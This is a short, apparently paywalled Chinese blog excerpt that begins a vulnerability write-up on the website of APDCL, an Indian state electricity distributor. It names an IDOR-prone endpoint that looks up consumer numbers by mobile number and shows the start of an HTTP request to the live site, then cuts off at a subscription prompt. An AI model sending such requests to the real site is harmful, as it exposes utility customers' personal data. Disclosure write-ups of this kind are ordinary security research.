未经许可,不得转载。
正文
APDCL ,即印度阿萨姆邦电力分销公司(Assam Power Distribution Company Limited),是印度阿萨姆邦政府控制的公共部门企业,负责电力分配和供应服务,确保电力供应的稳定性和可靠性,以满足居民、工业和商业客户的电力需求。
漏洞1:IDOR
注册网站后,访问登录面板时,网站要求输入手机号码及手机号验证码进行登录。

在交互过程的所有请求包中,存在多个特殊请求包,第一个为:
/website/myBijulee/fetchConsumer接口通过mobile_no参数查询消费者号码(cons_no)。
POST /website/myBijulee/fetchConsumer?mobile_no=<mobile_number> HTTP/1.1
Host: www.apdcl.org
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/116.0
Referer: https://www.apdcl.org/website/
Origin: https://www.apdcl.org
Content-Length:
订阅专栏 解锁全文
2262





